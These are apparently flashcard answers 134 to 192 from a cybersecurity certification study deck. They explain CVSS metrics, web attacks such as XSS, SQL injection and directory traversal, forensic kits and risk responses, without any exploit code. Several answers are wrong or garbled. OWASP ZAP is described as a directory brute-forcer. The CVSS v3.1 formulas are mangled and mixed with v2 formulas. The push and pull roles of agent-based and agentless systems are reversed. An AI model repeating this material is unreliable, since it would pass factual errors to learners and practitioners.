A point-of-sale (POS) application would only check for the application version vulnerability. It is not a way to hack in and of itself as it is just enumeration.

The operating system (OS) version enumerates OS version details and verifies for any vulnerabilities. Again, this is just enumeration, not a way to hack in.

Answer 134

A

Succession planning does support a defense-in-depth strategy. It is a personnel consideration, not a technological one.

Answer 135

A

Automated reporting capabilities – can be scheduled to be delivered to the proper individual in the organization when generated. A variety of report types are available and are tailored for the audience to which they are directed.

Security appliances – hardware devices that are designed to provide some function that supports the securing of the network or detecting
vulnerabilities and attacks.

Security suites – collections of security utilities combined into a single tool.

Outsourcing of security services – security services provided by third parties with more talent and experience than may exist in the organization.

Cryptography services – supporting the three core principles of the confidentiality, integrity, and availability (CIA) triad, cryptosystems also directly provide authentication, confidentiality, integrity, authorization, and non-repudiation.

Other personnel issues that support a defense-in-depth strategy include:

Security training
Dual control
Separation of duties
Proper securing of third party/consultants
Cross training
Mandatory vacation

Answer 136

A

Checking to see if an application block list prevents the installation of a particular executable file would be an example of security controls testing. Security controls testing determines if controls have been properly implemented, performing as expected and producing the appropriate results.

Answer 137

A

To best protect the business and the operations, the company should use a standard layered approach to secure the ICS. Because there are many attack vectors, no one security measure would be sufficient. Attack vectors may include digital attacks from the outside seeking to steal financial information or disrupt the system’s operations, insider errors, malicious insiders, or physical attacks or disruptions. Layered security includes the usual hardware and software additions to provide mitigation against known attacks, and adds employee security awareness training for additional protection.

Answer 138

A

Reverse engineering involves analyzing the compiled mobile app or system data to extract source code information to be used in understanding and potentially manipulating the underlying architecture of the mobile application or operating system. Attackers use reverse engineering techniques to compromise the OS of a mobile device (i.e., Android, Apple iOS) to root or jailbreak it (gain unrestricted access to the entire root of the OS).

Answer 139

A

An overflow attack revolves around malicious code requiring more memory than is allocated by a buffer. A buffer is a memory allocation that is designed to hold a finite amount of data. In other words, the attacker attempts to write more data into an application’s pre-built buffer than that buffer was intended to hold. When an attacker can add data that exceeds the buffer limits, the extra information spills over past the buffer into adjacent memory, where it can then crash the system or execute malicious code.

All types of overflows can be reduced by examining all input prior to accepting it. The input can be examined to ensure it has the correct length and that no malicious character types are present.

Answer 140

A

occurs when a memory allocation that is designed to hold a finite amount of data is full.

Answer 141

A

occurs when a part of memory dynamically allocated at runtime, typically containing program data, is full.

Answer 142

A

occurs when a part of memory used to store local variables used inside a function and parameters passed through a function and their return addresses, is full.

Answer 143

A

occurs when a mathematical operation attempts to create a numerical value that is too large for the available storage space.

Answer 144

A

The Temporal score and the Environmental score are not MANDATORY components of the Common Vulnerability Scoring System (CVSS) Base Score in CVSS v3.1. The Base Score formula depends on sub-formulas for Impact Sub-Score (ISS), Impact, and Exploitability, all of which are defined below:

Impact Sub Score is calculated as follows:

1-[(1-Confidentiality) × (1-Integrity) × (1-Availability)]

The Impact Score is calculated as follows:

If Scope is unchanged, then 6.42 x Impact Sub Score
If Scope is changed, then 7.52 x (Impact Sub Score-0.029)-3.25 x (Impact Sub Score-0.02)

The Exploitability Score is calculated as follows:

8.22 x AttackVector x AttackComplexity x PrivilegesRequired x UserInteraction

The Base Score is then calculated as follows:
If ImpactSubScore <0 then 0, else:
If Scope is unchanged, Roundup(Minimum[Impact+Exploitability),10]
If Scope is changed, Roundup(Minimum[1.08 x (Impact+Exploitability),10])

The Temporal Score, while not a mandatory component, is calculated as follows:
Roundup(BAseScore x ExploitCodeMaturity x RemediationLevel x ReportConfidence)

The Environmental Score, while not a mandatory component, is calculated as follows:
If ModifiedImpact <=0, then 0, else
If ModifiedScopeis unchanged then
Roundup (Roundup [Minimum ([ModifiedImpact + ModifiedExploitability], 10) ] × ExploitCodeMaturity × RemediationLevel × ReportConfidence)

If ModifiedScope is changed, then
Roundup (Roundup [Minimum (1.08 × [ModifiedImpact + ModifiedExploitability], 10) ] × ExploitCodeMaturity × RemediationLevel × ReportConfidence)

To determine the impact function, you must know the impact score. If the Impact score is 0 when calculated with the above formula, then the Impact Function value is also 0. Otherwise, you assign the Impact Function value as 1.176. That is ALWAYS the value.

The formula for calculating the exploitability score is:

Exploitability = 20 x AccessVector x AccessComplexity x Authentication

The formula for calculating the CVSS Base Score is:

BaseScore = ((0.6 x Impact) + (0.4 x Exploitability) 1.5) x ImpactFunction

Most vulnerability scanners provide the CVSS Base Score along with a breakdown of the individual rankings of the six metrics listed above.

Answer 145

A

Exploiting the vulnerability does NOT require either physical access to the target or a local (shell) account on the target. The Access Vector (AV) metric has a value of A, which stands for Adjacent Network. This means that exploiting the vulnerability requires access to the local network of the target, not the target itself.

Answer 146

A

P – stands for Physical and means the attacker must physically touch the vulnerable component to carry out the attack

L – stands for Local and means the attacker must have physical or logical access to the affected system itself

A – stands for Adjacent network and means the attacker must be on a logically adjacent network (such as the local IP subnet) or the same physical network

N – stands for Network and means the attacker can use the vulnerability from any network location on the Internet

Answer 147

A

The User Interaction (UI) base metric is used to indicate whether or not the attacker requires a human user to do anything for the attack to succeed, such as installing software.

Answer 148

A

The SysAdmin, Audit, Network, and Security (SANS) organization sponsors the Global Information Assurance Certification (GIAC). They also provide training, perform research, and publish best practices for cybersecurity, web security, and application security. They provide guidelines for secure software development.

Answer 149

A

Of the options listed, the security analyst should be most concerned with the Confidentiality or C metric because it is rated as H, or High. This means that there would be a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.

Though it was not listed as an option, the Attack Complexity (AC) value is L (Low), which is the worst possible value for this metric and also a matter of high concern.

The CVSS vector CVSS:3.1/AV:P/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N measures eight base metrics:

Attack Vector (Physical),
Attack Complexity
(Low),
Privileges Required (High),
User Interaction (Required), Scope (Unchanged),

Confidentiality (High), Integrity (Low), and Availability (None).

Answer 150

A

DNS cache poisoning is the act of entering false information into a DNS cache so that DNS queries return an incorrect response and users are directed to the wrong website. This attack is also known as DNS spoofing. Because the IT department is not seeing the same things that the user is, it is likely that the user’s DNS cache has been poisoned and her session is being redirected to a different website.

Answer 151

A

Dynamic scans do not involve manually examining the code; that is static analysis.

Answer 152

A

Static code analysis is performed without the code executing. Code review and testing must occur throughout the entire application development life cycle. Code review and testing must identify bad programming patterns, security misconfigurations, functional bugs, and logic flaws.

Answer 153

A

Fuzz testing, or fuzzing, involves injecting invalid or unexpected input (sometimes called faults) into an application to test how the application reacts. It is usually done with a software tool that automates the process.

Answer 154

A

An interception proxy is an application that stands between the web server and the client and passes all requests and responses back and forth. While it does so, it analyzes the information to test the security of the web application. A web application proxy can also “crawl” the site and its application to discover the links and content contained.

Answer 155

A

Segmentation considerations are made to control which sections of the network are scanned. This technique supports ensuring that operations and productivity are not negatively impacted by the scan and that any machines exempted from the scan are not scanned. Segmentation can be accomplished with subnetting and ACLs on the routers to prevent the scan from accessing exempted systems.

Answer 156

A

Sensitivity level considerations involve determining how deeply the machines are scanned and are addressed by choosing an appropriate scan type. For example, a credentialed scan will scan more deeply and render more valuable information than an uncredentialed scan, but it will also impact the machine’s performance and create more network traffic.

Answer 157

A

The Scope (S) metric is a determination as to whether a vulnerability in one system or component can have carry-over impact on another system or component. It has two possible values:

Changed (C) – An exploited vulnerability can have carry-over impact on another system.

Unchanged (U) – An exploited vulnerability is limited in damage to only the local security authority.

In this example, the S:U score indicates the vulnerability is limited in scope to the affected system. This is the better score.

The User Interaction (UI) base metric is used to indicate whether or not the user must do anything for the attack to succeed. The UI metric has two possible values:

None (N) – No user interaction is required.

Required (R) – A user must complete some steps for the exploit to succeed. For example, a user might be required to install some software.

The Attack Vector (AV) base metric describes how the attacker would exploit the vulnerability. It has four possible values:

L – stands for Local and means the attacker must have physical or logical access to the affected system.

A – stands for Adjacent network and means the attacker must be on the local network.

N – stands for Network and means the attacker can cause the vulnerability from any network.

P – stand for Physical and requires the attacker to physically touch the device.
Called Authentication in earlier versions of CVSS,

the Privileges Required (PR) metric describes the level of access required to mount this attack. There are three possible values:

None (N): The attacker does not need any privileges to exploit the vulnerability.

Low (L): The attacker is required to have basic privileges in a system to exploit the vulnerability.

High (H): The attacker has to have higher privileges in a system to exploit the vulnerability. The necessity of higher privileges may seem contradictory but the vulnerable component and impacted component might be different.

Answer 158

A

The attacker is required to have basic privileges in the system to exploit the vulnerability. Called Authentication in earlier versions of CVSS, the Privileges Required (PR) metric describes the level of access required to mount this attack. There are three possible values:

None (N): The attacker does not need any privileges to exploit the vulnerability.
Low (L): The attacker is required to have basic privileges in a system to exploit the vulnerability.
High (H): The attacker has to have higher-level privileges in a system to exploit the vulnerability. The necessity of higher privileges may seem contradictory, but the vulnerable component and impacted component might be different.
Whether the attacker needs to be physically present or not is not described by the PR metric. The Attack Vector (AV) metric describes how the attacker would exploit the vulnerability. AV is an Exploitability metric in the Base metric group. It has four possible values:

P – stands for Physical and means the attacker must physically touch the vulnerable component to carry out the attack
L – stands for Local and means the attacker must have physical or logical access to the affected system itself
A – stands for Adjacent network and means the attacker must be on a logically adjacent network (such as the local IP subnet) or the same physical network
N – stands for Network and means the attacker can use the vulnerability from any network location on the Internet
For this metric, P is the best ranking and N is the worst.

Answer 159

A

A Supervisory Control and Data Acquisition (SCADA) device is a system operating with coded signals over communication channels that provides control of remote equipment. It is not used in forensic investigations.

Answer 160

A

Digital forensics workstation – A dedicated workstation for processing an investigation that includes special tools and utilities that make the process easier and more productive.

Write blockers – A tool that permits read-only access to data storage devices without compromising the integrity of the data.

Cables – You should carry a variety of cables for connecting to storage devices.

Drive adapters – Adapters can enable connections to drives for which you have no cable.

Wiped removable media – Your kit should have removable media of various types that has been wiped clean. These may include USB flash drives, external hard drives, Multimedia Cards (MMC), Secure Digital (SD) cards, Compact Flash (CF) card, Memory Sticks, xD Picture cards, CDs, CD-RW, DVDs, and Blu-ray discs.

Cameras – Digital cameras with 12 megapixels (MP) or greater image sensors and manual exposure settings (in addition to any automatic or programmed exposure modes) are usually suitable for crime scene and evidence photography.

Crime tape – Flagging or adhesive pre-preprinted tape intended to block the area and prevent any unauthorized individuals from entering.

Tamper-proof seals – Used to ensure that the chain of custody is maintained.

Documentation/forms – Used to document the crime, the crime scene, and the evidence. There may also be interviews with witnesses. Most of these form templates are developed by the company based on standards.

Answer 161

A

The forms that should be present in the kit are:

Chain of custody form – This form will indicate who has handled the evidence, when they handled it, and the order in which the handler was in possession of the evidence.

Incident response plan – This plan should be formally designed, well communicated, and followed. It should specifically address cyber-attacks against an organization’s IT systems.

Incident form – This form is used to describe the incident in detail. It should include sections to record CMOS, hard drive information, image archive details, analysis platform information, and other details.

Call list/escalation list – This list should indicate under what circumstance individuals should be contacted and should include current contact information.

Answer 162

A

An attacker would need to be on the local system to exploit this vulnerability using read/write/execute capabilities. The local system access could be physical (such as convincing the user to open the attacker’s program on the system through social engineering) or remote (such as establishing a SSH connection to a console and then executing commands).

Answer 163

A

Your organization experienced a cross-site scripting (XSS) attack. An XSS attack occurs when an attacker locates a vulnerability on a website that allows the attacker to inject malicious code into a web application. A persistent XSS attack occurs when data provided to the web application is first stored persistently on the server and later displayed to users without being encoded using HTML on the web client. A non-persistent XSS attack occurs when data provided by a web client is used immediately by server-side scripts to generate results for that user. XSS flaws occur every time an application takes user-supplied data and sends it to a web browser without first confirming or encoding the data.

To locate XSS attacks, you should look for lines in the web server log that contain JavaScript or other scripting languages that forward a user’s session cookie to an external location or web page.

Answer 164

A

Reverse engineering means to take something apart to discover how it works and perhaps to replicate it. In cybersecurity, reverse engineering is used to analyze both hardware and software for various reasons. Among these reasons are:

To discover how malware functions

To determine whether
malware is present in software

To locate software bugs

To locate security problems in hardware

Answer 165

A

Detective managerial control – Job rotation

Detective physical control – CCTV

Corrective logical control – Centralized data backups

Preventative managerial
control – Security awareness training

Preventative logical control – Biometric authentication

Preventative physical control – Mantraps

Answer 166

A

This is an example of a compensating control. Compensating controls are temporary measures that are put in place to satisfy a requirement that is too difficult to implement. In this scenario, a third-party auditor compensates for the lack of the primary control, separation of duties. By itself, auditing is a detective control.

Answer 167

A

A redirect attack is occurring. Redirects are not inherently a bad thing in and of themselves. For instance, they are a useful function to have when building a website. If a user attempts to access a resource before they are logged in, it is conventional to redirect them to the login page, put the original URL in a query parameter, and then automatically redirect them towards their original destination after they have logged in. But there are always two sides to a coin! This is the exact reason that spammers and phishers use redirects and why they are so enticing. Attackers can bounce a user off a site they want to go to and send them to an exact replica that is a malicious version of the site, where the user will log in and end up downloading malware, disclosing confidential information, and so on. This is a malicious redirecting attack.

This is not an example of remote code execution. Arbitrary or remote code execution occurs when hackers take advantage of a vulnerability to gain access to a system and then place malicious code there, which they subsequently execute remotely.

This is not a server-side request forgery (SSRF). An SSRF attack involves targeting a server that hosts a web application to fetch a remote resource without validating the user-supplied URL. This allows an attacker to make the application send a crafted request to an unexpected destination, even when the system is protected by a firewall, VPN, or additional network access control list. Starting in 2021, SSRF was added to the OWASP Top 10 list that is comprised of the most critical web application security risks to date.

An SQL command injection is one of many types of injection attacks in which malicious SQL statements are injected into an input field in a web request and executed on a database server.

Answer 168

A

When a server is handling sales, it is typically handling credit card data and cardholder data. The Payment Card Industry Data Security Standard (PCI DSS) is an information security framework for organizations that process credit card transactions or handle cardholder data from the major card vendors.

Answer 169

A

OWASP ZAP was primarily designed to brute force both directory and file names on web application servers.

Answer 170

A

Agentless systems are based on the push communication style in which the associated software pushes data to a remote system on a periodic basis. Whereas agent-based systems use a pull method in which the agents are interrogated by a central system for data.

Answer 171

A

The Federal Information Security Management Act (FISMA) is a part of the regulatory reporting requirements that affect the vulnerability scanning rate. All laws and regulations that affect the organization must be fully analyzed to determine their effect on the scanning rate.

Answer 172

A

The Open Web Application Security Project (OWASP) identifies the top 10 security issues each year for web servers, and provides recommendations and guidelines to address these vulnerabilities.

Answer 173

A

In an SQL injection attack, the attacker uses a web application to gain access to an underlying, backend database. Semicolons (;) and apostrophes (‘) are characteristics of these attacks. For example, the single quote in SQL is a limiter, meaning it ends any current SQL string. This is important for attackers to craft true conditions or true statements to bypass authentication or pull more information from a database than is allowed.

Answer 174

A

The risk management principle of accept (acceptance) is being described. Acceptance is when you acknowledge that a risk may occur but do not try to prevent it. Examples of acceptance would include taking no action at all or leaving the original security plan unchanged and developing a contingency or fallback plan. It is recommended that you accept a risk when the cost of the safeguard exceeds the amount of the potential loss.

The transfer principle (transference) involves shifting the risk and its consequences to a third party. The third party is then responsible for owning and managing the risk. Purchasing insurance is an example of transference.

The avoid principle (avoidance) involves modifying the security plan to eliminate the risk or its impact. Examples of avoidance would include stopping a risky activity altogether, adding security resources to eliminate the risk, or removing resources to eliminate the risk.

The mitigate principle (mitigation) involves reducing the probability or impact of a risk to an acceptable risk threshold. To mitigate a risk, you would take actions to minimize the probability of the risk occurring. Biometric locks on a server room’s doors mitigate the risk of an intruder breaking in where sensitive data is housed.

Answer 175

A

A camera is a detective control because it allows you to detect when an issue occurs.

Answer 176

A

This is a directory traversal attack, also known as a path traversal attack. Directory traversal is a very common attack against sites. It is an easy way to get around login information or to access private galleries, files, or even username and email lists. Frequently, this attack requires guessing which subdirectory and/or filename is your target. With some detective work, you can follow the normal file and domain structures that are out there. You can do this attack by using two different methods: the (…/) method or by typing in the absolute path (https://interconn.com/wp-content/uploads/2018/03).

Answer 177

A

This is not cookie manipulation. Cookies are small pieces of data created and stored in a user’s browser that keep track of important information regarding the user’s session for a particular site. Cookie manipulation, also called cookie poisoning, is when a hacker is able to change data within that cookie to take over that user’s information or bypass security measures on websites.

Answer 178

A

While all considerations are important, it is critical that any organization that is operating in an industry where federal regulations, such as HIPPA or PCI-DSS, are in effect, ensures that the scan supports verification that regulatory requirements are being met.

Answer 179

A

They are performing technical impact review. This is the process of assessing the potential impact of an event that is technical in nature. Once all assets have been identified and their value to the organization has been established, specific threats to each asset are identified. An attempt must be made to establish both the likelihood of the threat being realized, as well as the impact to the organization, should that occur. This can be done by assigning values like high, medium, and low to the threats to describe their impact and likelihood.

Answer 180

A

An escalation of privileges attack occurs when an attacker has used a design flaw in an application to obtain unauthorized access to the application. Privilege escalation includes incidents where a user logs in with valid credentials and then takes over the privileges of another user, or where a user logs in with a standard account and uses a system flaw to obtain administrative privileges.

Answer 181

A

Race condition – typically targets timing, mainly the delay between time of check (TOC) and time of use (TOU). To eliminate race conditions, application developers should create code that processes exclusive-lock resources in a certain sequence and unlocks them in reverse order.

Answer 182

A

Insecure direct object references – occurs when a developer exposes a reference to an internal object, such as a file, directory, database record, or key, as a URL or form parameter without implementing the appropriate security control. An attacker can manipulate direct object references to access other objects without authorization. Implementing an access control check helps to protect against these attacks.

Answer 183

A

Cross-site request forgery (CSRF) – occurs when a malicious site executes unauthorized commands from a user on a web site that trusts the user. It is also referred to as one-click attack or session riding. Implementing anti-forgery tokens protect against this attack.

Answer 184

A

Improper error and exception handling – occurs when developers do not design appropriate error or exception messages in an application. The most common problem because of this issue is the fail-open security check, which occurs when access is granted (instead of denied) by default. Other issues include system crashes and resource consumption. Error handling mechanisms should be properly designed, implemented, and logged for future reference and troubleshooting.

Answer 185

A

Improper storage of sensitive data – occurs when sensitive data is not properly secured when it is stored. Sensitive data should be encrypted and protected with the appropriate access control list. Also, when sensitive data is in memory, it should be locked.

Answer 186

A

Secure cookie storage and transmission – Cookies store a user’s web site data, often including confidential data, such as usernames, passwords, and financial information. A secure cookie has the secure attribute enabled and is only used via HTTPS, ensuring that the cookie is always encrypted during transmission.

Answer 187

A

Memory leaks – occur when an application does not release memory after it is finished working with it. Reviewing coding and designing best practices helps to prevent memory leaks.

Answer 188

A

Data remnants – occurs when applications are removed but data remnants, including registry entries, are left behind. Specialty tools and apps are available to ensure that applications have been completely removed from a device.

Answer 189

A

The cost of a scan is typically not a main consideration. Even in scenarios where a third party is hired, the cost is typically not a deterrent when identifying vulnerabilities that are considered to be critical.

Answer 190

A

VM Escape is likely to only affect virtual machines and virtual infrastructure. In an escape attack, the attacker has access to a single virtual host, and then leverages that access to intrude upon the resources assigned to a different virtual machine.

Answer 191

A

You have determined one or more of the scan’s sensitivity levels because you are performing a discovery scan, which is used to create an inventory of assets based on host or service discovery.

Answer 192

A

Issue B should take priority because it has the highest CVSS value of 9.1, which is considered a critical issue.

The Common Vulnerability Scoring System (CVSS) is a system of ranking vulnerabilities that are discovered based on pre-defined metrics. This system ensures that the most critical vulnerabilities can be easily identified and addressed after a vulnerability test is met. Scores are awarded on a scale of 0 to 10, with the values having the following ranks:

0 – No issues
0.1 to 3.9 – Low
4.0 to 6.9 – Medium
7.0 to 8.9 – High
9.0 to 10.0 – Critical

Brainscape's Knowledge GenomeTM

2. Vulnerability Types and Concepts Flashcards

Brainscape's Knowledge Genome^TM